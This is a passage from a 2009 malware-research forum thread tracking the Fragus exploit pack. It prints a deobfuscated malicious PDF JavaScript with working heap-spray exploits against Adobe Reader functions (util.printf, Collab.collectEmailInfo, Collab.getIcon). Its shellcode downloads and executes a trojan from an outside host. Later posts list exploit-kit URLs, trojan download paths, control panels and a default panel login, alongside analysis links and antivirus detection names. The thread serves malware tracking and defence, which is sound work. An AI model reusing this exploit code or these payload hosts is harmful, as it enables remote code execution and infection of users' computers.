198,191,142,147,195,141,133,202,134,141,139,144,132,204,196,204,134,218,200,187,201,204,201,212,195,200,187,200,196,211,163,210,204,192,118,164,204,216,197,224,113,204,200,204,217,205,214,183,132,198,194,199,214,168,189,126,147,131,146,218,204,187,201,204,201,212,146,202,177,183,213,155,218,140,152,114,130,217,191,216,215,208,184,196,145,189,206,197,217,138,202,139,140,143,141,162,178,188,139,130,220,197,217,188,191,210,200,197,197,217,187,183,220,181,150,193,164,134,142,140,128,140,140,221,170,200,214,195,213,210,198,170,200,213,187,223,191,152,166,147,160,138,143,224,227,113,204,196,204,217,205,214,183,181,196,204,216,197,224,164,135,192,151,163,149,141,111,204,196,204,217,205,214,183,181,196,204,216,197,224,164,136,192,150,153,141,144,196,203,215,195,210,195,215,187,191,209,206,204,140,144,132,211,109,195,204,140,143,191,183,213,205,207,211,213,168,183,213,204,199,221,194,121,179,159,146,143,224,227,113,204,196,204,217,205,214,183,181,196,204,216,197,224,164,134,192,151,163,156,141,111,204,196,204,217,205,214,183,181,196,204,216,197,224,164,135,192,150,152,138,141,191,183,213,205,207,211,213,168,183,213,204,199,221,194,123,179,159,140,143,141,226,172,197,207,198,199,198,198,174,195,196,195,210,140,144,132,211,109,195,204,140,143,191,183,213,205,207,211,213,168,183,213,204,199,221,194,121,179,159,147,143,224,227,113,204,196,204,217,205,214,183,181,196,204,216,197,224,164,134,192,151,163,157,141,111,204,196,204,217,205,214,183,181,196,204,216,197,224,164,135,192,150,151,141,144,196,185,210,198,210,197,201,168,189,200,206,207,199,214,183,126,140,149,227,225,113,185,186,201,185,217,216,200,187,202,139,131,161];

2 section FlateDecode

Code: [Select]
for (var amnsx=0, fioqtu='';amnsx<5298;amnsx++){fioqtu += String.fromCharCode(fra[amnsx]-'gIVcZfd'.substring(amnsx%'gIVcZfd'.length,amnsx%'gIVcZfd'.length+1).charCodeAt(0));}eval(fioqtu);


output variant:

Code: [Select]
function fix_it(yarsp, len)
{
    while (yarsp.length * 2 < len) {
        yarsp += yarsp;
    }
    yarsp = yarsp.substring(0, len / 2);
    return yarsp;
}
function util_printf()
{
    var payload = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u706D%u7472%u3377%u652E%u6578%u0000");
    var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A") var heapblock = nop + payload;
    var bigblock = unescape("%u0A0A%u0A0A");
    var headersize = 20;
    var spray = headersize + heapblock.length;
    while (bigblock.length < spray) {
        bigblock += bigblock;
    }
    var fillblock = bigblock.substring(0, spray);
    var block = bigblock.substring(0, bigblock.length - spray);
    while (block.length + spray < 0x40000) {
        block = block + block + fillblock;
    }
    var mem_array = new Array();
    for (var i = 0; i < 1400; i++) {
        mem_array[i] = block + heapblock;
    }
    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
    util.printf("%45000f", num);
}
function collab_email()
{
    var shellcode = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u622F%u6963%u716F%u7A78%u2E33%u7865%u0065");
    var mem_array = new Array();
    var cc = 0x0c0c0c0c;
    var addr = 0x400000;
    var sc_len = shellcode.length * 2;
    var len = addr - (sc_len + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = fix_it(yarsp, len);
    var count2 = (cc - 0x400000) / addr;
    for (var count = 0; count < count2; count++) {
        mem_array[count] = yarsp + shellcode;
    }
    var overflow = unescape("%u0c0c%u0c0c");
    while (overflow.length < 44952) {
        overflow += overflow;
    }
    this.collabStore = Collab.collectEmailInfo({
        subj : "", msg : overflow
    });
}
function collab_geticon()
{
    if (app.doc.Collab.getIcon)
    {
        var arry = new Array();
        var vvpethya = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u6A67%u6E6C%u3373%u652E%u6578%u0000");
        var hWq500CN = vvpethya.length * 2;
        var len = 0x400000 - (hWq500CN + 0x38);
        var yarsp = unescape("%u9090%u9090");
        yarsp = fix_it(yarsp, len);
        var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
        for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++) {
            arry[vqcQD96y] = yarsp + vvpethya;
        }
        var tUMhNbGw = unescape("%09");
        while (tUMhNbGw.length < 0x4000) {
            tUMhNbGw += tUMhNbGw;
        }
        tUMhNbGw = "N." + tUMhNbGw;
        app.doc.Collab.getIcon(tUMhNbGw);
    }
}
function pdf_start()
{
    var version = app.viewerVersion.toString();
    version = version.replace(/\D/g, '');
    var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
    if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)) {
        util_printf();
    }
    if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)) {
        collab_email();
    }
    if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)) {
        collab_geticon();
    }
}
pdf_start();


shellcode download & execute file hxxp://got77.biz/peg/dmprtw3.exe
Title: Re: Fragus exploit pack
Post by: SysAdMini on September 13, 2009, 12:23:00 pm
Quote from: WIEx on September 13, 2009, 11:46:59 am
Malware-Web-Threats )

shellcode download & execute file hxxp://got77.biz/peg/dmprtw3.exe

As mentioned earlier in this thread, file names change at each run. So it is not wrong what Anthony has posted.
Title: Re: Fragus exploit pack
Post by: danielch1 on September 13, 2009, 06:02:09 pm
user:
admin
password:
adminadmin
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on September 13, 2009, 09:21:50 pm
Code: [Select]
gat77.biz/peg/show.php?s=75dbfbfc1f
gat77.biz/iloprsvxy.ipg
gat77.biz/dost.pdf
gat77.biz/manual.swf
gat77.biz/peg/aeq2.exe
gat77.biz/peg/bghprwz5.exe
gat77.biz/peg/admin.php (control panel)
Wepawet (http://wepawet.iseclab.org/view.php?hash=f81b97a95263a0bfcde4cca31baa5a88&t=1252875860&type=js)
VirusTotal (http://www.virustotal.com/analisis/4471c9636b7807a1bb7cf1e93770f74b1167b31aed01d7a9e60de8800e8daaae-1252875866) - 3/41 (7.32%)
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on September 14, 2009, 09:49:33 am
Exploits:
Code: [Select]
fot77.biz/peg/show.php?s=ccc648c6ef
fot77.biz/peg/ckz.pdf
fot77.biz/peg/manual.swf

Trojan:
Code: [Select]
fot77.biz/peg/abdehinw3.exe
fot77.biz/peg/aklpqty2.exe
fot77.biz/peg/bcginru3.exe
fot77.biz/peg/ehity3.exe
fot77.biz/peg/ehlpquvyz3.exe
fot77.biz/peg/hiuvz5.exe
fot77.biz/peg/kmsw3.exe
fot77.biz/peg/luxy3.exe

Control Panel:
Code: [Select]
fot77.biz/peg/admin.php

Wepawet (http://wepawet.iseclab.org/view.php?hash=7b2f51336a2740578248b694b3307464&t=1252920606&type=js)
VirusTotal (http://www.virustotal.com/analisis/a639ed588082ec996ac260ed9fffbec4b0deb14ffe619133368fbd2fa6cb10b7-1252920624) - 2/41 (4.88%)

File size: 32768 bytes
MD5: 051ae824e14a68e0c8c77c18ebd6d557

McAfee-GW-Edition: Heuristic.LooksLike.Worm.Bezopi.B
Rising: Unknown Win32 Virus
Title: Re: Fragus exploit pack
Post by: CkreM on September 14, 2009, 09:55:03 pm
Few Fragus exploit kit links:

Code: [Select]
kilogid2.biz/pol/admin.php
kilogid2.biz/pol/show.php
kilogid2.biz/pol/manual.swf
kilogid2.biz/pol/pdf.pdf
kilogid2.biz/pol/load.php?e=2
Code: [Select]
ledyzpizdik.cn/admin.php
ledyzpizdik.cn/show.php
ledyzpizdik.cn/manual.swf
ledyzpizdik.cn/pdf.pdf
ledyzpizdik.cn/load.php?e=2
Code: [Select]
domain25.net/index/admin.php
domain25.net/index/show.php
domain25.net/index/manual.swf
domain25.net/index/pdf.pdf
domain25.net/index/load.php?e=2
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on September 14, 2009, 11:30:04 pm
Exploits
Code: [Select]
fit77.biz/peg/show.php?s=75dbfbfc1f
fit77.biz/peg/show.php?s=ccc648c6ef
fit77.biz/peg/manual.swf

Trojan
Code: [Select]
fit77.biz/peg/bcemqrv3.exe
fit77.biz/peg/cdnw3.exe
fit77.biz/peg/clpvx3.exe
fit77.biz/peg/degoqrz5.exe
fit77.biz/peg/efginopy2.exe
fit77.biz/peg/eikmnpuv3.exe
fit77.biz/peg/gilo3.exe
fit77.biz/peg/hiks3.exe

Control Panel:
Code: [Select]
fit77.biz/peg/admin.php

Wepawet (http://wepawet.iseclab.org/view.php?type=js&hash=02002192a60d511d8e6660eff534062c&t=1252949734)
VirusTotal (http://www.virustotal.com/analisis/5199ea7b98c94b33c4cbf0b211b577e8863b14525958548e50823f8d9dee4f09-1252949857) - 4/41 (9.76%)

a-squared: Worm.Win32.Bezopi!IK
Ikarus: Worm.Win32.Bezopi
Microsoft: VirTool:Win32/Obfuscator.GP
Rising: Unknown Win32 Virus
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on October 10, 2009, 02:19:47 pm
Code: [Select]
justpaythis.cn/frag/news.php?s=3b7e95ce5d
justpaythis.cn/frag/manual.swf
justpaythis.cn/frag/ipsz.pdf
justpaythis.cn/frag/sdfg.jar
justpaythis.cn/frag/click.php?r=
justpaythis.cn/frag/afhnwy2.exe
justpaythis.cn/frag/bimnuz2.exe
justpaythis.cn/frag/binwx2.exe
justpaythis.cn/frag/dhjku2.exe
justpaythis.cn/frag/efksvw7.exe
justpaythis.cn/frag/ejkx2.exe
justpaythis.cn/frag/nqtx2.exe
justpaythis.cn/frag/sdgsg5.exe
http://wepawet.iseclab.org/view.php?hash=4ae087e346a324548d108e4e5e9594d3&t=1255079289&type=js
Title: Re: Fragus exploit pack
Post by: CkreM on October 12, 2009, 11:00:03 pm
Fragus:
Code: [Select]
soft-bumbum.biz/cat/news.php?s=24e79fe4f2http://wepawet.iseclab.org/view.php?hash=f7e140053ef8f27aaa8cf876a2406bdb&t=1255387491&type=js
PDF:
Code: [Select]
soft-bumbum.biz/cat/ijlpuy.pdf
soft-bumbum.biz/cat/gnpsz.pdfFlash:
Code: [Select]
soft-bumbum.biz/cat/manual.swfjava exploit?:
Code: [Select]
soft-bumbum.biz/cat/sdfg.jarhttp://www.virustotal.com/analisis/eb4f3bd460824c701f3a99463a16e4307f5a4c111f1dc610d26db82d6436f842-1255387420


also redirects to:
Code: [Select]
yoriksli.net?uid=176&pid=3&ttl=9194f502492which redirects to fake AV at:
Code: [Select]
scan-localzone.com/?p=WKmimHVlb2%2BHjsbIo22EhHV8ipnVbWeMnNah2qeMoIHT0NqnWJaimHWWl3%2BnU9janW1mZWtsymKSYmSfX4nX15Krp6mih9esb2VraW1ncHCUY5SMlJNq
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on October 13, 2009, 09:37:23 pm
Code: [Select]
blogkz.cn/news.php?s=326356cda1
blogkz.cn/dhmy.pdf
blogkz.cn/manual.swf
blogkz.cn/sdfg.jar
blogkz.cn/dshdsgfh4.exe
blogkz.cn/aekoz2.exe
blogkz.cn/bglm2.exe
blogkz.cn/cfhjz2.exe
blogkz.cn/dfnpw2.exe
blogkz.cn/dghkr7.exe
blogkz.cn/djtu2.exe
blogkz.cn/fpsy2.exe
blogkz.cn/sdgsg5.exe
blogkz.cn/file.exe

Code: [Select]
privetmedved.cn/news.php?s=326356cda1
privetmedved.cn/click.php?r=
privetmedved.cn/aeikvw2.exe
privetmedved.cn/asuxy2.exe
privetmedved.cn/bgkou2.exe
privetmedved.cn/bgnou7.exe
privetmedved.cn/celtvw2.exe
privetmedved.cn/efjmq2.exe
privetmedved.cn/gjmz2.exe
privetmedved.cn/sdgsg5.exe
privetmedved.cn/file.exe

Code: [Select]
fromads.com/in.cgi?10
Code: [Select]
goople.biz/adv.js/news.php?s=827ac7d108
goople.biz/adv.js/bcelpu.pdf
goople.biz/adv.js/manual.swf
goople.biz/adv.js/sdfg.jar
goople.biz/adv.js/dshdsgfh4.exe
goople.biz/adv.js/amortv2.exe
goople.biz/adv.js/anqrt2.exe
goople.biz/adv.js/aopsy2.exe
goople.biz/adv.js/dghk7.exe
goople.biz/adv.js/dknuv2.exe
goople.biz/adv.js/ikpy2.exe
goople.biz/adv.js/izrd2.exe
goople.biz/adv.js/sdgsg5.exe
goople.biz/adv.js/file.exe
http://wepawet.iseclab.org/view.php?hash=a52840a5c5718667a0fcbe59a547224a&t=1255441903&type=js
Title: Re: Fragus exploit pack
Post by: Malware-Web-Threats on October 13, 2009, 09:50:51 pm
Code: [Select]
qweasdd.net/fragus/pdf.php
qweasdd.net/fragus/load.php
qweasdd.net/fragus/admin.php